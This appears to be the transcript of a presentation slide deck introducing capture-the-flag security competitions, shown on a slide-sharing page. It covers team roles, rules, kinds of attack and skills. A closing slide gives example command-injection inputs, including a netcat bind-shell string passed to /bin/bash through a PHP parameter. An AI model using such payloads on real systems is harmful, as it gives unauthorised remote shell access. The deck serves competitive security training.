CAPTURE THE FLAG Introductions beer brew man dutchrowboat.

Slides:



Advertisements
Similar presentations
Incident Handling & Log Analysis in a Web Driven World Manindra Kishore.
Advertisements

Closing the Gap: Analyzing the Limitations of Web Application Vulnerability Scanners David Shelly Randy Marchany Joseph Tront Virginia Polytechnic Institute.
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
ECE454/599 Computer and Network Security Dr. Jinyuan (Stella) Sun Dept. of Electrical Engineering and Computer Science University of Tennessee Fall 2012.
1 No Silver Bullet : Inherent Limitations of Computer Security Technologies Jeffrey W. Humphries Texas A&M University.
Case Studies for Projects. Network Audit A brief description of the systems (via fingerprinting, if black box is used) Network perimeter should be described.
Security Presented by : Qing Ma. Introduction Security overview security threats password security, encryption and network security as specific.
System and Network Security Practices COEN 351 E-Commerce Security.
Network Security Testing Techniques Presented By:- Sachin Vador.
IT Security Doug Brown Jeff Bollinger. What is security? P.H.P. People Have Problems Security is the mitigation and remediation of human error in information.
Welcome to EECS 354 Network Penetration and Security.
Web server security Dr Jim Briggs WEBP security1.
Hacking Web Server Defiana Arnaldy, M.Si
Intrusion Prevention System Group 6 Mu-Hsin Wei Renaud Moussounda Group 6 Mu-Hsin Wei Renaud Moussounda.
Web Application Security Assessment and Vulnerability Assessment.
Capture The Flag Review Fall 2003 Giovanni Vigna University of California Santa Barbara
A Scanner Sparkly Web Application Proxy Editors and Scanners.
CTF Mike Gerschefske Justin Gray. What is it? Came from Defcon Came from Defcon UCSB sp0nsorz – won last years Defcon UCSB sp0nsorz – won last years Defcon.
Directory and File Transfer Services Chapter 7. Learning Objectives Explain benefits offered by centralized enterprise directory services such as LDAP.
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public 1 Version 4.1 ISP Responsibility Working at a Small-to-Medium Business or ISP – Chapter 8.
Shared success Outline What is network security? Why do we need security? Who is vulnerable? Common security attacks and countermeasures. How to secure.
Penetration Testing Training Day Capture the Flag Training.
Shuo Chen, Jun Xu, Emre C. Sezer, Prachi Gauriar, and Ravishankar K. Iyer Brett Hodges April 8, 2010.
AIS, Passwords Should not be shared Should be changed by user Should be changed frequently and upon compromise (suspected unauthorized disclosure)
Brad Baker CS526 May 7 th, /7/ Project goals 2. Test Environment 3. The Problem 4. Some Solutions 5. ModSecurity Overview 6. ModSecurity.
April 14, 2008 Secure Coding Faculty Workshop Web Application Security: Exercise Development Approaches James Walden
Web Application Access to Databases. Logistics Test 2: May 1 st (24 hours) Extra office hours: Friday 2:30 – 4:00 pm Tuesday May 5 th – you can review.
Ladd Van Tol Senior Software Engineer Security on the Web Part One - Vulnerabilities.
1-Vulnerabilities 2-Hackers 3-Categories of attacks 4-What a malicious hacker do? 5-Security mechanisms 6-HTTP Web Servers 7-Web applications attacks.
What’s Going On? This is a “Capture The Flag” hacking contest Teams from a number of Universities/Institutions compete against each other Each team has.
 International  UCSB Sponsored  Application security  ! network security  ! os security  Custom services 2.
IST 210 Web Application Security. IST 210 Introduction Security is a process of authenticating users and controlling what a user can see or do.
Computer & Network Security
Honeypot and Intrusion Detection System
OS Hardening Justin Whitehead Francisco Robles. ECE Internetwork Security OS Hardening Installing kernel/software patches and configuring a system.
Software Security Testing Vinay Srinivasan cell:
OSI and TCP/IP Models And Some Vulnerabilities AfNOG th May 2011 – 10 th June 2011 Tanzania By Marcus K. G. Adomey.
Attacking Applications: SQL Injection & Buffer Overflows.
1 Internet Browsing Vulnerabilities and Security ECE4112 Final Lab Ye Yan Frank Park Scott Kim Neil Joshi.
SIGITE 2008: Oct Integrating Web Application Security into the IT Curriculum James Walden Northern Kentucky University.
1 Vulnerability Assessment of Grid Software James A. Kupsch Computer Sciences Department University of Wisconsin Condor Week 2007 May 2, 2007.
Cisco Router Hacking Group 8 Vernon Guishard Kelvin Aguebor ECE 4112.
CSE 4481 Computer Security Lab Mark Shtern. INTRODUCTION.
CIS 450 – Network Security Chapter 14 – Specific Exploits for UNIX.
CANVAS REPORT/rvispute 16/4/2016 CANVAS Report for CTF Event at USAFA on 4/25/2007 Subject :Penetration Tools for Front Range Pen Test Exercise By Rajshri.
Alert Logic Provides a Fully Managed Security and Compliance Solution Based in the Cloud, Powered by the Robust Microsoft Azure Platform MICROSOFT AZURE.
Denial of Service Sharmistha Roy Adversarial challenges in Web Based Services.
BY SYDNEY FERNANDES T.E COMP ROLL NO: INTRODUCTION Networks are used as a medium inorder to exchange data packets between the server and clients.
EECS 354: Network Security Group Members: Patrick Wong Eric Chan Shira Schneidman Web Attacks Project: Detecting XSS and SQL Injection Vulnerabilities.
DenyAll Delivering Next-Generation Application Security to the Microsoft Azure Platform to Secure Cloud-Based and Hybrid Application Deployments MICROSOFT.
Lab #2 NET332 By Asma AlOsaimi. "Security has been a major concern in today’s computer networks. There has been various exploits of attacks against companies,
Education – Partnership – Solutions Information Security Office of Budget and Finance Christopher Giles Governance Risk Compliance Specialist The Internet.
ASHRAY PATEL Securing Public Web Servers. Roadmap Web server security problems Steps to secure public web servers Securing web servers and contents Implementing.
Network Security SUBMITTED BY:- HARENDRA KUMAR IT-3 RD YR. 1.
Hacker Games By Wenonah Abadilla. What is a Hacker Game? Learn and practice security concepts Fun-filled games.
CHAPTER 7: IDENTIFYING ADVANCED ATTACKS McKinley Technology HS - Cybersecurity.
Common System Exploits Tom Chothia Computer Security, Lecture 17.
HIPS. Host-Based Intrusion Prevention Systems  One of the major benefits to HIPS technology is the ability to identify and stop known and unknown attacks,
Lab #2 NET332 By Asma AlOsaimi.
Network security Vlasov Illia
Project CTF Yeganeh Safaei Arizona State University
CSCE 548 Student Presentation By Manasa Suthram
Working at a Small-to-Medium Business or ISP – Chapter 8
CompTIA Security+ SY0-401 Real Exam Question Answer
World Wide Web policy.
EN Lecture Notes Spring 2016
CANVAS Report for CTF Event at USAFA on 4/25/2007
ICTF EC2 By Daniel Ruiz.
Gregory Morton COSC380 February 16, 2011
Presentation transcript:

CAPTURE THE FLAG Introductions beer brew man dutchrowboat

Teams  Firewall  IDS/IPS  Services – Attack and Defense  PHP, Perl, Ruby, Python, Java  Analysis  Wireshark, etc.  C/ASM  Operating System  Apache, OS Configuration, etc.

iCTF  Came from Defcon  iCTF ran by UCSB  No test required – just edu  “Largest existing live security exercise”  Test Skills of understanding security

What is it?  A variety of Internet enabled services  Services comprised of:  PHP  Perl  Shell Scripts  C++  MySQL  Apache/lighttpd  SSH  XML RPC  FTP

What to do  All services should be protected  Patch  IPS/IDS  All services should be attacked

Blender  SNAT with weights?  Is it real?

Rules  No DOS  All traffic is penalized  Must stay on internal network  Don't prevent legitimate traffic  Don't break rules  If attack service, don't launch DOS from compromised machine  2005 Defcon – hack the scorebot

Attack Techniques  Buffer overflows  Format string attacks  Shell attacks  Race conditions  Misconfigurations  Authentication attacks  Web-based attacks  Directory traversal  Cookie-based services  Cross-site scripting  Server-side applications  Lack of parameter validation (e.g., SQL injection)‏

Skills  Scanning  Firewalling  Intrusion Detection  Vulnerability analysis  For each type of vulnerability  How to identify a vulnerability  How to exploit a vulnerability  How to patch a vulnerability (without disrupting the get/set flag methods) ‏  How to detect a vulnerability  For each service  How to monitor the requests to a service  How to monitor the execution of a request  Protocol security analysis  Application security analysis

Vigna's Suggestions  Have a structured team with clear responsibilities  The Perl/Python/PHP group  The SQL/database group  The flaw-finder group  The firewall group  The IDS group  The C-based exploit group  Have a leader responsible for coordination and integration  Have a way to intercept socket connections and apply regexes/substitutions  Have vulnerability analysis tools handy  Have a “human IDS”  Remember: the game lasts only a few hours

Not the first time…

2009

Questions ?

Backups…

Test Network Real Network Image Vuln Team Hub Team Box Mon Box x Attack Boxes Console for Fixes Image Test Box Vuln Patch Test Vuln Attack Box UCCS Boxes UCCS Boxes

Some Examples  echo GET / | nc >./myoutput.txt  php?command=nc -lp e /bin/bash  php?command=nmap -p > port.txt

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.